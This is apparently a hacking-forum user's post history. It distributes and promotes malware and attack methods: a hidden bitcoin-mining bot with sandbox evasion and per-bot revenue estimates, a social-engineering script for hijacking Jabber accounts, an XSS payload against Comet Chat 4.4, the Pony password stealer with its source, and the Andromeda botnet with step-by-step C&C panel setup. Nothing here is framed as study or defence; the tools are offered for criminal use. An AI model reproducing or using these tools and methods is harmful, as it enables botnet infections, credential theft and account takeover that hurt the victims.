B3st

Active Members
  • Posts: 352
  • Joined
  • Last visited
  • Days Won: 8

Everything posted by B3st

  1. @daatdraqq Well, man, the bin doesn't have any kind of mutex. If you open it 15 times, the PC gets fucked up fast. I have to make some kind of mutex; I have no way to set a mutex in the 'remote process' .. it could probably be done through shellcode ..
  2. Damn it, the password is: RIP ISR
  3. @chill_toica The official exchanger for bitcoin is: this one, see the prices here
  4. Yeah, it seems it was because of mpress. I had "protected" the client with mpress, and that was causing that error. Redownload, thanks to sandobot for the report.
  5. Previous version

     Compatibility: windows xp, vista, 7, 8 on x86 and x64.
     Server size: 9 kb (compressed with upx); the server has no dependencies (dll, framework, etc.)
     m.jpg = ufasoft miner modified by me to work injected, encrypted with rc4. The miner downloads m.jpg, decrypts it and injects it into memory using predefined parameters, so the server is totally 'crypt-able'.
     +Anti sandboxie, vmware, anubis, virtualpc
     +Startup, melt, proxy.
     Made in vb6, compiled with the vb2012 linker.

     Notes:
     1. In principle, 1k bots generate between 700 and 1.4k $ per month.
     2. No RDPs, they have crap GPUs.
     3. No countries such as pakistan, afghanistan and so on (they have poor components)
     4. Use the proxy only if you run the server on many PCs.
     5. The server has a mutex; for it to work you must enable melt + startup.

     Blowjob with mushrooms: http://www.youtube.com/watch?v=l3EcbK1jKTE

     Updated: 01.25.2013
     Download: RST Miner v2.1.rar
     Password: rstforums.com

     Don't put it on other forums (=! english), otherwise I assume bitcoin will be brought down pretty quickly.
     "Permanent" link: https://rstforums.com/proiecte/RST_Miner_v2.1.rar
  6. B3st

    Test RST Miner v2

    You won't do much of anything with the high school PCs; I suspect they have really bad GPUs. In principle, with this version, with 1k bots you make about 700-1.3k $ per month.
  7. B3st

    Test RST Miner v2

    It doesn't require it, not even UAC.. absolutely nothing. As in the previous version, m.jpg = ufasoft miner modified by me to work injected. Plus, that m.jpg is encrypted with rc4 and the miner injects it into memory .. it doesn't save it to the HDD. @djpliku Thanks for the test. It still needs a small test on vista & windows 8 x64 and that's it. There's no reason for it not to work .. but still.
  8. Previous version: https://rstforums.com/forum/60066-rst-miner-v1.rst I managed to get it working on windows 7/8, but it still needs testing .. As far as I know, this is the first bitcoin miner > hidden + works on all Windows NT (xp, vista, 7, 8) x86 & x64. Small server, 9 kb, which works crypted at run-time .. unlike all the others, which don't work crypted. I still need a few tests on windows 8 x86 & x64 + windows xp/vista. Then it remains to be discussed with the admins whether I make it public or not; in at most 3-5 months bitcoin will be down if it ends up in everyone's hands.
  9. Man, this trick is from around 2004 .. I'm surprised it still works. Plus, everything I have: laptop, phone, tv, lcd & other crap, I got from the gypsies. When I need something new I go straight to the neighborhood. Vouch for gipsy.
  10. There aren't many Romanians on jabber, but I figured this "tutorial" was worth translating. Many jabber servers don't require an email to register, so with a bit of SE you can find out/change the password very easily. More precisely: you have to make 2-4 accounts and add the victim to the list. Then you simply go to the page of that jabber server and email them.

      "Greetings, I would like you to change the password of this account: gigi@jabbim.pl I registered this account on your server x months ago; to prove to you that this is my account, here are a few of the accounts from my contact list: vasile@jabber.ru, ion@jabbim.pl, ilie@thesecure.biz. The last time I logged into this account was x hours/days ago. If you need more details, let me know. Respect, gigi@jabbim.pl"

      Preferably also make a "fake" mail account; e.g. if your victim's account is like gigi@jabbim.pl, then make an account: gigi@mail.ru.

      A short list of servers where this method works: @jabbim.cz @jabbim.com @jabbim.pl @jabbim.cz @jabbim.sk @njs.netlab.cz @jabster.pl @jabber.root.cz @jabber.at @thesecure.biz (could be harder, but still works) @jabber.org @draugr.de @xmpp.jp (i'm not sure about this) @twattle.net ..etc

      Source: http://trojanforge.com/showthread.php?t=2463
  11. @bcman Go take kaspersky vs bitdefender into IDA pro/olly dbg/kernel detective .. then talk about what each one can do. Bitdefender is a piece of crap "a la rumanian".. nothing more. E.g. when you click "scan with kaspersky", it executes your file in a hidden sandbox and sees what it does; a generic detection is created if that file performs anal procedures. Plus, kaspersky emulates many functions, like CopyFile/NtWriteVirtualMemory/etc .. you only get past these if you have a rootkit that blocks access to these functions, and after a restart the ones used can no longer be emulated, so they have no way to detect you at run-time anymore. That's roughly the principle of a rootkit: it blocks the emulation of some basic functions or moves them to other addresses in the respective dll. Plus, the certificate thing can't even be applied to stuxnet. (the certificate was put in because otherwise that driver wouldn't work on x64) Since stuxnet has a ring3 rootkit, the server will have more permissions than any antivirus .. there's no way the antiviruses can remove it through generic detections, because they don't have the permissions. That's why the guys made a tool to kill it; I assume that tool in turn has a ring3 rootkit so it can kill it. Beat that ..
  12. @kids If you use kaspersky, no such malware can infect you, only if it has a ring3/0 rootkit. But you use nod32/avira/bitdefender .. all the junk made only for marketing, not for security.
  13. Dark.. in my ass, the one after dark is another cowherd. This was some guy who took tools from the Russians and sold them to 'english people' (on osc, for example) ..
  14. http://www.7image.ru/pics/0113/331649179.png Now that's a challenge.
  15. @Nytro Why don't you make a cron job with those mysql commands, so you don't keep running them manually. Or, more simply, you can modify vbulletin on the ip-get side and give it the desired value
  16. Take it easy, what you see here is public. The rest we keep for ourselves
  17. Excuse me for interrupting your rst awards ceremony -best retards of the year. But why, man, are you doing obsolete projects (copy-pastes) on a SECURITY forum? aka "the essence of the future is the digital core" >> in your case that digital core in the "future" will only have its version and name changed .. if you get what I mean.
  18. Discovered by: 001
      05.12.2012
      Application: Comet Chat 4.4
      hackyard.net and trojanforge.com

      cometchat/plugins/games/index.php?action=request&toId=1&gameId=');"><script>alert('Hackyard.net')</script>Sudoku<!--&gameWidth=1337

      It may also work in Comet Chat 4.6 or other versions, but I haven't tested it. You need to make one new account on the targeted website. Then you can use this XSS like this (toId = target id):

      Demo: http://www.opensc.ws/chat/plugins/games/index.php?action=request&toId=1&gameId=');"><script>alert('Hackyard.net')</script>Sudoku<!--&gameWidth=1337
  19. http://www.youtube.com/watch?v=feuGs4ynwgs
  20. Merry Christmas to Everyone!

      Panel looks like this:
      Builder:

      Purpose and Objectives of this project
      -Collecting FTP / HTTP passwords from 95 + popular FTP-client and Web-browser from infected computers.
      -Collecting E-mail password (POP3, IMAP, SMTP).
      -Collecting signing certificates of executable files and drivers.
      -Collect RDP(Remote Desktop Connection) passwords.
      -Invisible to the user's application.
      -Minimum amount of work and time grabber on the infected computer.

      Collect passwords from your computer and send them to c&c panel. Works on all versions of Windows, from Win98 to Windows 8(including windows server) - x86 and x64.

      Implemented instantaneous decoding for saved passwords for the following programs: System Info FAR Manager Total Commander WS_FTP CuteFTP FlashFXP FileZilla FTP Commander BulletProof FTP SmartFTP TurboFTP FFFTP CoffeeCup FTP / Sitemapper CoreFTP FTP Explorer Frigate3 FTP SecureFX UltraFXP FTPRush WebSitePublisher BitKinex ExpanDrive ClassicFTP Fling SoftX Directory Opus FreeFTP / DirectFTP LeapFTP WinSCP 32bit FTP NetDrive WebDrive FTP Control Opera WiseFTP FTP Voyager Firefox FireFTP SeaMonkey Flock Mozilla LeechFTP Odin Secure FTP Expert WinFTP FTP Surfer FTPGetter ALFTP Internet Explorer Dreamweaver DeluxeFTP Google Chrome Chromium / SRWare Iron ChromePlus Bromium (Yandex Chrome) Nichrome Comodo Dragon RockMelt K-Meleon Epic Staff-FTP AceFTP Global Downloader FreshFTP BlazeFTP NETFile GoFTP 3D-FTP Easy FTP Xftp FTP Now Robo-FTP LinasFTP Cyberduck Putty Notepad++ CoffeeCup Visual Site Designer FTPShell FTPInfo NexusFile FastStone Browser CoolNovo WinZip Yandex.Internet MyFTP sherrod FTP NovaFTP Windows Mail Windows Live Mail Becky! Pocomail IncrediMail The Bat! Outlook Thunderbird FastTrack

      Builder coded in delphi XE2, stub coded in asm(32 kb compressed).

      @HF Skids: Do NOT touch this bot if you are not good in linux, the panel has many dependencies.

      Download: Pony 1.9.rar (panel + builder + stub source)
      Pasw: TrojanForge.co

      //Just another copy & paste, maybe it's useful to you.
  21. It seems they gave him another +29 days ..
  22. Source: HF Clearly, in case you didn't know, on mediafire you can change the file and the link stays the same. So the guy first uploads it clean, then after a while replaces it with a backdoored one.
  23. Nah, he has to chmod 777 config.php and then he can log in with admin:admin. Btw, I posted the update to the tutorial & builder.
  24. This botnet is sold on Russian forums for 1.5k.

      Options:
      1. Incredible stability, made in asm.
      2. Server size: 13 kb (uncompressed)
      3. Doesn't use dlls for injection/form grabber.
      4. Form grabber: internet explorer, google chrome, firefox and opera (all versions, also catches ssl)
      5. Socks4
      6. Ring3 rootkit

      Hi, first let me clear something off. As people didn't like the idea of being private, I was having intend by doing so it was meant for a test first, I was going to public it some more days but seems like people are not patient. As you can see some people tried to piss me off to let me release it, I don't really give a damn care about the new version, I was just trying to let them have a calm and understand the situation, because I already decided before to not work on Andromeda again. Sure RE is all about challenges but my challenge is not Andromeda again, all in all Andromeda is a nasty bot, I don't like it, it costs more time than other bots because it is not a simple text to change so you have to know what you are doing otherwise you will stuck. People just don't understand, it is not a simple task, I had to write nearly 600 lines of code to get this done so it is not easy as it may seem to be. I never say something I am not sure of, if I was not have the knowledge to do it then I would not say I can do it. Anyway here is my builder, hope you enjoy it.

      How to set up it:
      1. Upload /Panel files to androhost.com/andro
      2. Create one mysql db.
      3. Upload f.pack, r.pack and s.pack from /Plugins folder in: androhost.com/andro directory.
      4. chmod 777 androhost.com/andro/config.php, chmod 777 androhost.com/andro/fp_logs directory
      5. Open in your browser androhost.com/andro/index.php?act=install.
      6. Login with default credentials: admin:admin
      7. Paste rc4 key to andromeda installation page: d40e75961383124949436f37f45a8cb6
      8. Fill up all installation page with your admin user and pasw, plus mysql details >> click 'Install'
      9. After installation is done open in your browser androhost.com/andro/ifg.php
      10. Delete androhost.com/andro/ifg.php and androhost.com/andro/GeoIPCountryWhois.csv.gz
      11. Open Builder.exe > change host to: http://androhost.com/andro/image.php and build your bin.
      12. For enable plugins just go in panel > menu > tasks > add task. Task type = Install plugin, Url= http://androhost.com/andro/r.pack. Click 'Enabled' and add your task, do the same for each plugin.

      Enjoy it

      Download: Andromeda v2.06.rar
      Pass: TrojanForge.co